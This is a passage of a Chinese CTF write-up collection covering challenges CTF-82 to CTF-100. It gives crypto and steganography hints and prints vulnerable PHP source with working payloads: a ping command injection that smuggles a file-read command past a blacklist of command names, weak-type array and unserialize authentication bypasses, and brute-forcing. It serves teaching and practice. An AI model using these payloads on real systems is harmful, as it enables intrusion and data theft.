<div class="markdown-body editormd-preview-container" previewcontainer="true" style="padding: 20px;"><div class="markdown-toc editormd-markdown-toc"><ul class="markdown-toc-list"><li><a class="toc-level-2" href="#CTF-82" level="2">CTF-82</a></li><li><a class="toc-level-2" href="#CTF-83" level="2">CTF-83</a></li><li><a class="toc-level-2" href="#CTF-84" level="2">CTF-84</a></li><li><a class="toc-level-2" href="#CTF-85" level="2">CTF-85</a></li><li><a class="toc-level-2" href="#CTF-86" level="2">CTF-86</a></li><li><a class="toc-level-2" href="#CTF-87" level="2">CTF-87</a></li><li><a class="toc-level-2" href="#CTF-88" level="2">CTF-88</a></li><li><a class="toc-level-2" href="#CTF-89" level="2">CTF-89</a></li><li><a class="toc-level-2" href="#CTF-90" level="2">CTF-90</a></li><li><a class="toc-level-2" href="#CTF-91" level="2">CTF-91</a></li><li><a class="toc-level-2" href="#CTF-92" level="2">CTF-92</a><ul><li><a class="toc-level-3" href="#源码" level="3">源码</a></li><li><a class="toc-level-3" href="#payload：" level="3">payload：</a></li></ul></li><li><a class="toc-level-2" href="#CTF-93" level="2">CTF-93</a></li><li><a class="toc-level-2" href="#CTF-94" level="2">CTF-94</a></li><li><a class="toc-level-2" href="#CTF-95" level="2">CTF-95</a></li><li><a class="toc-level-2" href="#CTF-96" level="2">CTF-96</a><ul><li><a class="toc-level-3" href="#源码审计" level="3">源码审计</a></li><li><a class="toc-level-3" href="#脚本:" level="3">脚本:</a></li><li><a class="toc-level-3" href="#payload:" level="3">payload:</a></li></ul></li><li><a class="toc-level-2" href="#CTF-97" level="2">CTF-97</a><ul><li><a class="toc-level-3" href="#源码" level="3">源码</a></li></ul></li><li><a class="toc-level-2" href="#CTF-98" level="2">CTF-98</a></li><li><a class="toc-level-2" href="#CTF-99" level="2">CTF-99</a></li><li><a class="toc-level-2" href="#CTF-100" level="2">CTF-100</a><ul><li><a class="toc-level-3" href="#源码" level="3">源码</a></li><li><a class="toc-level-3" href="#payload:" level="3">payload:</a></li></ul></li><li><a class="toc-level-2" href="#CTF-101" level="2">CTF-101</a><ul><li><a class="toc-level-3" href="#index.php源码" level="3">index.php源码</a></li><li><a class="toc-level-3" href="#payload:" level="3">payload:</a></li></ul></li><li><a class="toc-level-2" href="#CTF-102" level="2">CTF-102</a><ul><li><a class="toc-level-3" href="#源码" level="3">源码</a></li><li><a class="toc-level-3" href="#payload" level="3">payload</a></li></ul></li><li><a class="toc-level-2" href="#CTF-103" level="2">CTF-103</a><ul><li><a class="toc-level-3" href="#源码" level="3">源码</a></li><li><a class="toc-level-3" href="#payload" level="3">payload</a></li></ul></li><li><a class="toc-level-2" href="#CTF-104" level="2">CTF-104</a></li><li><a class="toc-level-2" href="#CTF-105" level="2">CTF-105</a><ul><li><a class="toc-level-4" href="#考点" level="4">考点</a></li><li><a class="toc-level-4" href="#代码" level="4">代码</a></li><li><a class="toc-level-4" href="#奇奇怪怪的waf" level="4">奇奇怪怪的waf</a></li><li><a class="toc-level-4" href="#变量覆盖" level="4">变量覆盖</a></li><li><a class="toc-level-4" href="#php弱类型" level="4">php弱类型</a></li><li><a class="toc-level-4" href="#php复杂变量" level="4">php复杂变量</a></li><li><a class="toc-level-4" href="#最终payload" level="4">最终payload</a></li><li><a class="toc-level-4" href="#其他Payload:" level="4">其他Payload:</a></li></ul></li><li><a class="toc-level-2" href="#CTF-106" level="2">CTF-106</a></li><li><a class="toc-level-2" href="#源码" level="2">源码</a></li><li><a class="toc-level-2" href="#CTF-107" level="2">CTF-107</a><ul><li><a class="toc-level-3" href="#源码" level="3">源码</a></li><li><a class="toc-level-3" href="#payload" level="3">payload</a></li></ul></li><li><a class="toc-level-2" href="#CTF-108" level="2">CTF-108</a><ul><li><a class="toc-level-3" href="#源码" level="3">源码</a></li></ul></li><li><a class="toc-level-2" href="#CTF-109" level="2">CTF-109</a></li><li><a class="toc-level-2" href="#源码" level="2">源码</a><ul><li><a class="toc-level-3" href="#POC" level="3">POC</a></li><li><a class="toc-level-3" href="#payload:" level="3">payload:</a></li></ul></li><li><a class="toc-level-2" href="#CTF-110" level="2">CTF-110</a><ul><li><a class="toc-level-3" href="#源码" level="3">源码</a></li></ul></li><li><a class="toc-level-2" href="#CTF-111" level="2">CTF-111</a><ul></ul></li></ul></div><h2 id="h2-ctf-82"><a name="CTF-82" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-82</h2><p><strong>页面的符号是<br>Jother编码</strong><br><strong><a href="https://blog.csdn.net/greyfreedom/article/details/45070667">https://blog.csdn.net/greyfreedom/article/details/45070667</a></strong><br><strong>直接把编码放到浏览器控制台运行即可获取flag</strong></p>
<h2 id="h2-ctf-83"><a name="CTF-83" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-83</h2><p><strong>flag被隐写在了图片里<br>按F12可以看到提示：<br><a href="http://www.atoolbox.net/Tool.php?Id=699">http://www.atoolbox.net/Tool.php?Id=699</a><br>可以用这个站点进行图片的解密看到flag</strong></p>
<h2 id="h2-ctf-84"><a name="CTF-84" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-84</h2><p><strong>把helloworld文件下载下来<br>重命名给它加上后缀<br>.7z 或者 .zip 或者.rar<br>然后解压得到了几个文件<br>用记事本打开zansdjopw文件<br>翻到最下面找到flag</strong></p>
<h2 id="h2-ctf-85"><a name="CTF-85" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-85</h2><p><strong>根据提示<br>10进制-&gt;字符 以及  注意颜色<br>将每个颜色代码里的两位数字转换成字符<br>就可以获取到flag了</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-C"><span class="com">#include</span><span class="pln"> </span><span class="str">&lt;stdio.h&gt;</span></code></li><li class="L1"><code class="lang-C"></code></li><li class="L2"><code class="lang-C"><span class="kwd">int</span><span class="pln"> main</span><span class="pun">()</span></code></li><li class="L3"><code class="lang-C"><span class="pun">{</span></code></li><li class="L4"><code class="lang-C"><span class="pln">    </span><span class="kwd">int</span><span class="pln"> a</span><span class="pun">[]</span><span class="pln"> </span><span class="pun">=</span><span class="pln"> </span><span class="pun">{</span><span class="lit">79</span><span class="pun">,</span><span class="lit">53</span><span class="pun">,</span><span class="lit">53</span><span class="pun">,</span><span class="lit">44</span><span class="pun">,</span><span class="lit">78</span><span class="pun">,</span><span class="lit">78</span><span class="pun">,</span><span class="lit">78</span><span class="pun">,</span><span class="lit">94</span><span class="pun">,</span><span class="lit">85</span><span class="pun">,</span><span class="lit">78</span><span class="pun">};</span></code></li><li class="L5"><code class="lang-C"><span class="pln">    </span><span class="kwd">for</span><span class="pun">(</span><span class="kwd">int</span><span class="pln"> i</span><span class="pun">=</span><span class="lit">0</span><span class="pun">;</span><span class="pln">i</span><span class="pun">&lt;</span><span class="lit">10</span><span class="pun">;</span><span class="pln">i</span><span class="pun">++){</span></code></li><li class="L6"><code class="lang-C"><span class="pln">           printf</span><span class="pun">(</span><span class="str">"%c"</span><span class="pun">,</span><span class="pln">a</span><span class="pun">[</span><span class="pln">i</span><span class="pun">]);</span></code></li><li class="L7"><code class="lang-C"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L8"><code class="lang-C"></code></li><li class="L9"><code class="lang-C"><span class="pln">   </span><span class="kwd">return</span><span class="pln"> </span><span class="lit">0</span><span class="pun">;</span></code></li><li class="L0"><code class="lang-C"><span class="pun">}</span></code></li></ol></pre>
<h2 id="h2-ctf-86"><a name="CTF-86" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-86</h2><p><strong>flag在音频的频谱图里<br>需要下载一个软件<br>Audacity工具（在附件里）<br>去查看音乐文件的频谱图</strong><br><strong>参考：<a href="https://www.pianshen.com/article/2535603446/">https://www.pianshen.com/article/2535603446/</a></strong></p>
<h2 id="h2-ctf-87"><a name="CTF-87" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-87</h2><p><strong>把txt文本里的字符按照页面提示进行转换</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">左正蹬</span><span class="pln"> </span><span class="pun">-&gt;</span><span class="pln"> </span><span class="pun">.</span></code></li><li class="L1"><code><span class="pun">右鞭腿</span><span class="pln"> </span><span class="pun">-&gt;</span><span class="pln"> </span><span class="pun">!</span></code></li><li class="L2"><code><span class="pun">左刺拳</span><span class="pln"> </span><span class="pun">-&gt;</span><span class="pln"> </span><span class="pun">?</span></code></li></ol></pre><p><strong>获取到了被Ook加密的flag</strong><br><strong>解密后得到flag</strong><br><strong><a href="https://www.splitbrain.org/services/ook">https://www.splitbrain.org/services/ook</a></strong></p>
<h2 id="h2-ctf-88"><a name="CTF-88" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-88</h2><p><strong>按F12查看源码可以看到被加密后的flag<br>给出了一道加法数学题算出来后得到 20<br>20是flag加密时的密钥</strong></p>
<p><strong>用zfua{kqcykqirhwyfxexeqq}去解密得到flag<br>密钥是20</strong></p>
<h2 id="h2-ctf-89"><a name="CTF-89" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-89</h2><p><strong>按F12修改源码中的maxlength的值<br><code>maxlength="3"</code><br>然后再输入100即可获取到flag</strong></p>
<h2 id="h2-ctf-90"><a name="CTF-90" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-90</h2><p><strong>F12查看源码看到了被加密的flag</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="kwd">function</span><span class="pln"> ifx</span><span class="pun">(</span><span class="pln">x</span><span class="pun">)</span></code></li><li class="L1"><code><span class="pun">{</span></code></li><li class="L2"><code><span class="pln">    </span><span class="kwd">if</span><span class="pun">(</span><span class="pln">x </span><span class="pun">&gt;=</span><span class="pln"> </span><span class="lit">1000000000000000</span><span class="pun">)</span></code></li><li class="L3"><code><span class="pln">    </span><span class="pun">{</span></code></li><li class="L4"><code><span class="pln">        alert</span><span class="pun">(</span><span class="str">"看到了就解个密吧! 加密的flag：evawvscdvcpbyxdgrvw  维吉尼亚zkaq"</span><span class="pun">);</span></code></li><li class="L5"><code><span class="pln">    </span><span class="pun">}</span></code></li><li class="L6"><code><span class="pun">}</span></code></li></ol></pre><p><strong>这里是维吉尼亚加密<br>密钥是:zkaq</strong></p>
<h2 id="h2-ctf-91"><a name="CTF-91" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-91</h2><p><strong>签到题难度解密题</strong></p>
<p><strong>将中文进行中文电码编码<br>中文电码：<a href="http://code.mcdvisa.com/">http://code.mcdvisa.com/</a><br>即可获取flag</strong></p>
<h2 id="h2-ctf-92"><a name="CTF-92" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-92</h2><h3 id="h3-u6E90u7801"><a name="源码" class="reference-link"></a><span class="header-link octicon octicon-link"></span>源码</h3><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="tag">&lt;meta</span><span class="pln"> </span><span class="atn">charset</span><span class="pun">=</span><span class="atv">"utf-8"</span><span class="pln"> </span><span class="tag">/&gt;</span></code></li><li class="L1"><code><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L2"><code><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'url'</span><span class="pun">])){</span></code></li><li class="L3"><code><span class="pln">    $ip</span><span class="pun">=</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'url'</span><span class="pun">];</span></code></li><li class="L4"><code><span class="pln">    </span><span class="kwd">if</span><span class="pun">(</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">"/('|&gt;|]|&amp;|\\$|\\|rev|more|tailf|head|nl|tail|tac|cat|rm|cp|mv|\*|\{)/i"</span><span class="pun">,</span><span class="pln"> $ip</span><span class="pun">)){</span></code></li><li class="L5"><code><span class="pln">        </span><span class="kwd">die</span><span class="pun">(</span><span class="str">"&lt;strong&gt;&lt;center&gt;非法字符&lt;/center&gt;&lt;/strong&gt;"</span><span class="pun">);</span></code></li><li class="L6"><code><span class="pln">    </span><span class="pun">}</span></code></li><li class="L7"><code><span class="pln">    </span><span class="kwd">if</span><span class="pun">(</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">"/.*f.*l.*a.*g.*/"</span><span class="pun">,</span><span class="pln"> $ip</span><span class="pun">)){</span></code></li><li class="L8"><code><span class="pln">        </span><span class="kwd">die</span><span class="pun">(</span><span class="str">"&lt;strong&gt;&lt;center&gt;非法字符&lt;/center&gt;&lt;/strong&gt;"</span><span class="pun">);</span></code></li><li class="L9"><code><span class="pln">    </span><span class="pun">}</span></code></li><li class="L0"><code><span class="pln">    $a </span><span class="pun">=</span><span class="pln"> shell_exec</span><span class="pun">(</span><span class="str">"ping -c 4 "</span><span class="pun">.</span><span class="pln">$ip</span><span class="pun">);</span></code></li><li class="L1"><code><span class="pln">    echo</span><span class="pun">(</span><span class="pln">$a</span><span class="pun">);</span></code></li><li class="L2"><code><span class="pun">}</span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L3"><code><span class="pln">    echo </span><span class="str">"&lt;script&gt;alert('No.......')&lt;/script&gt;"</span><span class="pun">;</span></code></li><li class="L4"><code><span class="pun">}</span></code></li><li class="L5"><code><span class="pun">?&gt;</span></code></li></ol></pre><p><strong>用;结束ping -c 4 127.0.0.1</strong></p>
<p><strong>cat过滤用ca\t</strong></p>
<p><strong>flag * 过滤用通配符????</strong></p>
<h3 id="h3-payload-"><a name="payload：" class="reference-link"></a><span class="header-link octicon octicon-link"></span>payload：</h3><p><code>127.0.0.1;ca\t ????.???</code></p>
<h2 id="h2-ctf-93"><a name="CTF-93" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-93</h2><p><strong>审计源码</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">&lt;?</span><span class="pln">php </span></code></li><li class="L1"><code><span class="pln">    highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span><span class="pln"> </span></code></li><li class="L2"><code><span class="pln">    ini_set</span><span class="pun">(</span><span class="str">"display_error"</span><span class="pun">,</span><span class="pln"> </span><span class="kwd">false</span><span class="pun">);</span><span class="pln">  </span></code></li><li class="L3"><code><span class="pln">    error_reporting</span><span class="pun">(</span><span class="lit">0</span><span class="pun">);</span><span class="pln">  </span></code></li><li class="L4"><code><span class="pln">    $str </span><span class="pun">=</span><span class="pln"> isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'A_A'</span><span class="pun">])?</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'A_A'</span><span class="pun">]:</span><span class="str">'A_A'</span><span class="pun">;</span><span class="pln"> </span></code></li><li class="L5"><code><span class="pln">    </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">strpos</span><span class="pun">(</span><span class="pln">$_SERVER</span><span class="pun">[</span><span class="str">'QUERY_STRING'</span><span class="pun">],</span><span class="pln"> </span><span class="str">"A_A"</span><span class="pun">)</span><span class="pln"> </span><span class="pun">!==</span><span class="kwd">false</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span><span class="pln"> </span></code></li><li class="L6"><code><span class="pln">        echo </span><span class="str">'A_A,have fun'</span><span class="pun">;</span><span class="pln"> </span></code></li><li class="L7"><code><span class="pln">    </span><span class="pun">}</span><span class="pln"> </span></code></li><li class="L8"><code><span class="pln">    elseif </span><span class="pun">(</span><span class="pln">$str</span><span class="pun">&lt;</span><span class="lit">9999999999</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span><span class="pln"> </span></code></li><li class="L9"><code><span class="pln">        echo </span><span class="str">'A_A,too small'</span><span class="pun">;</span><span class="pln"> </span></code></li><li class="L0"><code><span class="pln">    </span><span class="pun">}</span><span class="pln"> </span></code></li><li class="L1"><code><span class="pln">    elseif </span><span class="pun">((</span><span class="kwd">string</span><span class="pun">)</span><span class="pln">$str</span><span class="pun">&gt;</span><span class="lit">0</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span><span class="pln"> </span></code></li><li class="L2"><code><span class="pln">        echo </span><span class="str">'A_A,too big'</span><span class="pun">;</span><span class="pln"> </span></code></li><li class="L3"><code><span class="pln">    </span><span class="pun">}</span><span class="pln"> </span></code></li><li class="L4"><code><span class="pln">    </span><span class="kwd">else</span><span class="pun">{</span><span class="pln"> </span></code></li><li class="L5"><code><span class="pln">        echo file_get_contents</span><span class="pun">(</span><span class="str">'flag.php'</span><span class="pun">);</span><span class="pln"> </span></code></li><li class="L6"><code></code></li><li class="L7"><code><span class="pun">}</span></code></li></ol></pre><p><strong>首先第一个if判断，可以用urlencode绕过<br>然后我们需要知道php中的这样一个特性</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">php </span><span class="pun">&gt;</span><span class="pln"> var_dump</span><span class="pun">([]&gt;</span><span class="lit">9999999999</span><span class="pun">);</span></code></li><li class="L1"><code><span class="kwd">bool</span><span class="pun">(</span><span class="kwd">true</span><span class="pun">)</span></code></li><li class="L2"><code><span class="pln">php </span><span class="pun">&gt;</span><span class="pln"> var_dump</span><span class="pun">((</span><span class="kwd">string</span><span class="pun">)[]&gt;</span><span class="lit">0</span><span class="pun">);</span></code></li><li class="L3"><code><span class="kwd">bool</span><span class="pun">(</span><span class="kwd">false</span><span class="pun">)</span></code></li><li class="L4"><code><span class="lit">1</span></code></li><li class="L5"><code><span class="lit">2</span></code></li><li class="L6"><code><span class="lit">3</span></code></li><li class="L7"><code><span class="lit">4</span></code></li><li class="L8"><code><span class="pun">在</span><span class="pln">php</span><span class="pun">中，数组[]大于任何一个数</span></code></li></ol></pre><p><strong>这样就可以成功绕过验证了</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">payload</span><span class="pun">:</span></code></li><li class="L1"><code><span class="pun">?</span><span class="pln">A</span><span class="pun">+</span><span class="pln">A</span><span class="pun">[]=</span><span class="pln">admin</span></code></li></ol></pre><h2 id="h2-ctf-94"><a name="CTF-94" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-94</h2><p><strong>将汉字</strong><br><code>皎若云间月</code><br><a href="http://gbk.hsjsj.cn/">http://gbk.hsjsj.cn/</a><br><strong>进行先进行gbk然后再16进制编码获取flag</strong></p>
<h2 id="h2-ctf-95"><a name="CTF-95" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-95</h2><p><strong>右击页面查看到编码后的flag<br>或者修改body的颜色也可以查看到被编码的flag</strong><br><strong><a href="http://www.hiencode.com/base91.html">http://www.hiencode.com/base91.html</a></strong><br><strong>进行base91解码</strong></p>
<h2 id="h2-ctf-96"><a name="CTF-96" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-96</h2><h3 id="h3-u6E90u7801u5BA1u8BA1"><a name="源码审计" class="reference-link"></a><span class="header-link octicon octicon-link"></span>源码审计</h3><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">show_source</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L2"><code class="lang-php"><span class="pln">$username  </span><span class="pun">=</span><span class="pln"> </span><span class="str">"admin"</span><span class="pun">;</span></code></li><li class="L3"><code class="lang-php"><span class="pln">$password  </span><span class="pun">=</span><span class="pln"> </span><span class="str">"password"</span><span class="pun">;</span></code></li><li class="L4"><code class="lang-php"><span class="pln">include</span><span class="pun">(</span><span class="str">"flag.php"</span><span class="pun">);</span></code></li><li class="L5"><code class="lang-php"><span class="pln">$data </span><span class="pun">=</span><span class="pln"> isset</span><span class="pun">(</span><span class="pln">$_POST</span><span class="pun">[</span><span class="str">'data'</span><span class="pun">])?</span><span class="pln"> $_POST</span><span class="pun">[</span><span class="str">'data'</span><span class="pun">]:</span><span class="pln"> </span><span class="str">""</span><span class="pln"> </span><span class="pun">;</span></code></li><li class="L6"><code class="lang-php"><span class="pln">$data_unserialize </span><span class="pun">=</span><span class="pln"> unserialize</span><span class="pun">(</span><span class="pln">$data</span><span class="pun">);</span></code></li><li class="L7"><code class="lang-php"><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">$data_unserialize</span><span class="pun">[</span><span class="str">'username'</span><span class="pun">]==</span><span class="pln">$username</span><span class="pun">&amp;&amp;</span><span class="pln">$data_unserialize</span><span class="pun">[</span><span class="str">'password'</span><span class="pun">]==</span><span class="pln">$password</span><span class="pun">){</span></code></li><li class="L8"><code class="lang-php"><span class="pln">    echo $flag</span><span class="pun">;</span></code></li><li class="L9"><code class="lang-php"><span class="pun">}</span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L0"><code class="lang-php"><span class="pln">    echo </span><span class="str">"username or password error!"</span><span class="pun">;</span></code></li><li class="L1"><code class="lang-php"><span class="pun">}</span></code></li></ol></pre>
<p>直接反序列化不行 猜测在包含的时候改了 直接弱类型</p>
<h3 id="h3--"><a name="脚本:" class="reference-link"></a><span class="header-link octicon octicon-link"></span>脚本:</h3><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">$a </span><span class="pun">=</span><span class="pln"> array</span><span class="pun">(</span><span class="str">'username'</span><span class="pun">=&gt;</span><span class="lit">0</span><span class="pun">,</span><span class="str">'password'</span><span class="pun">=&gt;</span><span class="lit">0</span><span class="pun">);</span></code></li><li class="L2"><code class="lang-php"><span class="pln">echo serialize</span><span class="pun">(</span><span class="pln">$a</span><span class="pun">);</span></code></li><li class="L3"><code class="lang-php"></code></li><li class="L4"><code class="lang-php"><span class="com">//运行结果</span></code></li><li class="L5"><code class="lang-php"><span class="pln">a</span><span class="pun">:</span><span class="lit">2</span><span class="pun">:{</span><span class="pln">s</span><span class="pun">:</span><span class="lit">8</span><span class="pun">:</span><span class="str">"username"</span><span class="pun">;</span><span class="pln">i</span><span class="pun">:</span><span class="lit">0</span><span class="pun">;</span><span class="pln">s</span><span class="pun">:</span><span class="lit">8</span><span class="pun">:</span><span class="str">"password"</span><span class="pun">;</span><span class="pln">i</span><span class="pun">:</span><span class="lit">0</span><span class="pun">;}</span></code></li></ol></pre>
<p><img src="https://nc0.cdn.zkaq.cn/md/5597/798a03c7c06c57a4f972c800d6321b3e_12208.jpg" alt=""></p>
<h3 id="h3-payload-"><a name="payload:" class="reference-link"></a><span class="header-link octicon octicon-link"></span>payload:</h3><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">POST</span><span class="pun">:</span><span class="pln"> data</span><span class="pun">=</span><span class="pln">a</span><span class="pun">:</span><span class="lit">2</span><span class="pun">:{</span><span class="pln">s</span><span class="pun">:</span><span class="lit">8</span><span class="pun">:</span><span class="str">"username"</span><span class="pun">;</span><span class="pln">i</span><span class="pun">:</span><span class="lit">0</span><span class="pun">;</span><span class="pln">s</span><span class="pun">:</span><span class="lit">8</span><span class="pun">:</span><span class="str">"password"</span><span class="pun">;</span><span class="pln">i</span><span class="pun">:</span><span class="lit">0</span><span class="pun">;}</span></code></li></ol></pre><h2 id="h2-ctf-97"><a name="CTF-97" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-97</h2><p>通过访问/www.rar获取源码</p>
<h3 id="h3-u6E90u7801"><a name="源码" class="reference-link"></a><span class="header-link octicon octicon-link"></span>源码</h3><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">$c </span><span class="pun">=</span><span class="pln"> rand</span><span class="pun">(</span><span class="lit">65</span><span class="pun">,</span><span class="pln"> </span><span class="lit">122</span><span class="pun">);</span></code></li><li class="L2"><code class="lang-php"><span class="kwd">if</span><span class="pun">(</span><span class="pln">preg_match_all</span><span class="pun">(</span><span class="str">'/[1-9]/'</span><span class="pun">,</span><span class="pln"> </span><span class="lit">@$_GET</span><span class="pun">[</span><span class="str">'x'</span><span class="pun">])</span><span class="pln"> </span><span class="pun">==</span><span class="pln"> </span><span class="lit">0</span><span class="pun">){</span></code></li><li class="L3"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pun">(</span><span class="pln">chr</span><span class="pun">(</span><span class="pln">$c</span><span class="pun">)</span><span class="pln"> </span><span class="pun">==</span><span class="pln"> </span><span class="lit">@$_GET</span><span class="pun">[</span><span class="str">'x'</span><span class="pun">]){</span></code></li><li class="L4"><code class="lang-php"><span class="pln">        echo </span><span class="str">'flag:{xxxxxxxxxxxxxxxxxxxxxxx}'</span><span class="pun">;</span></code></li><li class="L5"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L6"><code class="lang-php"><span class="pln">        echo </span><span class="str">'?x == '</span><span class="pun">.</span><span class="str">"$c"</span><span class="pun">;</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L8"><code class="lang-php"><span class="pun">}</span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L9"><code class="lang-php"><span class="pln">    echo </span><span class="str">'No 0-9'</span><span class="pun">;</span></code></li><li class="L0"><code class="lang-php"><span class="pun">}</span></code></li><li class="L1"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<p><strong>随机生成65-122的数字，但是传参不允许传入数字</strong></p>
<p><strong>用burp加上26个字母的大小写进行爆破就可以获得flag了</strong></p>
<p><img src="https://nc0.cdn.zkaq.cn/md/5597/8a9669148b3eab47b7e398811529fa09_93985.png" alt=""><br><img src="https://nc0.cdn.zkaq.cn/md/5597/0f98c0154b12ac82a1fc2d26b503606f_91148.jpg" alt=""></p>
<h2 id="h2-ctf-98"><a name="CTF-98" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-98</h2><p><strong>页面提示需要玩到2048才能获取flag</strong></p>
<p><strong>直接F12修改源码中<br>val的值改成2048</strong><br><code>val="2048"</code><br><strong>然后再按一下AWSD任意一键即可获取flag</strong></p>
<h2 id="h2-ctf-99"><a name="CTF-99" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-99</h2><p><strong>右击页面查看源码可以看到flag.png</strong><br><strong>flag在flag.png中</strong><br><strong>flag做了双重加密<br>与佛论禅-&gt;base64  加密</strong><br><strong>按顺序解开即可获得flag</strong><br><code>与佛论禅：https://www.keyfc.net/bbs/tools/tudoucode.aspx</code><br><code>base64:http://www.ec95.com/</code></p>
<h2 id="h2-ctf-100"><a name="CTF-100" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-100</h2><h3 id="h3-u6E90u7801"><a name="源码" class="reference-link"></a><span class="header-link octicon octicon-link"></span>源码</h3><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pln"> </span><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">include </span><span class="str">'flag.php'</span><span class="pun">;</span></code></li><li class="L2"><code class="lang-php"><span class="pln">$yds </span><span class="pun">=</span><span class="pln"> </span><span class="str">"枫叶"</span><span class="pun">;</span></code></li><li class="L3"><code class="lang-php"><span class="pln">$is </span><span class="pun">=</span><span class="pln"> </span><span class="str">"河流"</span><span class="pun">;</span></code></li><li class="L4"><code class="lang-php"><span class="pln">$handsome </span><span class="pun">=</span><span class="pln"> </span><span class="str">'yds'</span><span class="pun">;</span></code></li><li class="L5"><code class="lang-php"></code></li><li class="L6"><code class="lang-php"><span class="kwd">foreach</span><span class="pun">(</span><span class="pln">$_POST </span><span class="kwd">as</span><span class="pln"> $x </span><span class="pun">=&gt;</span><span class="pln"> $y</span><span class="pun">){</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    $$x </span><span class="pun">=</span><span class="pln"> $y</span><span class="pun">;</span></code></li><li class="L8"><code class="lang-php"><span class="pun">}</span></code></li><li class="L9"><code class="lang-php"><span class="kwd">foreach</span><span class="pun">(</span><span class="pln">$_GET </span><span class="kwd">as</span><span class="pln"> $x </span><span class="pun">=&gt;</span><span class="pln"> $y</span><span class="pun">){</span></code></li><li class="L0"><code class="lang-php"><span class="pln">    $$x </span><span class="pun">=</span><span class="pln"> $$y</span><span class="pun">;</span></code></li><li class="L1"><code class="lang-php"><span class="pun">}</span></code></li><li class="L2"><code class="lang-php"><span class="kwd">foreach</span><span class="pun">(</span><span class="pln">$_GET </span><span class="kwd">as</span><span class="pln"> $x </span><span class="pun">=&gt;</span><span class="pln"> $y</span><span class="pun">){</span></code></li><li class="L3"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'flag'</span><span class="pun">]</span><span class="pln"> </span><span class="pun">===</span><span class="pln"> $x </span><span class="pun">&amp;&amp;</span><span class="pln"> $x </span><span class="pun">!==</span><span class="pln"> </span><span class="str">'flag'</span><span class="pun">){</span><span class="pln">    </span><span class="com">//GET方式传flag只能传一个flag=flag</span></code></li><li class="L4"><code class="lang-php"><span class="pln">        </span><span class="kwd">exit</span><span class="pun">(</span><span class="pln">$handsome</span><span class="pun">);</span></code></li><li class="L5"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L6"><code class="lang-php"><span class="pun">}</span></code></li><li class="L7"><code class="lang-php"><span class="kwd">if</span><span class="pun">(!</span><span 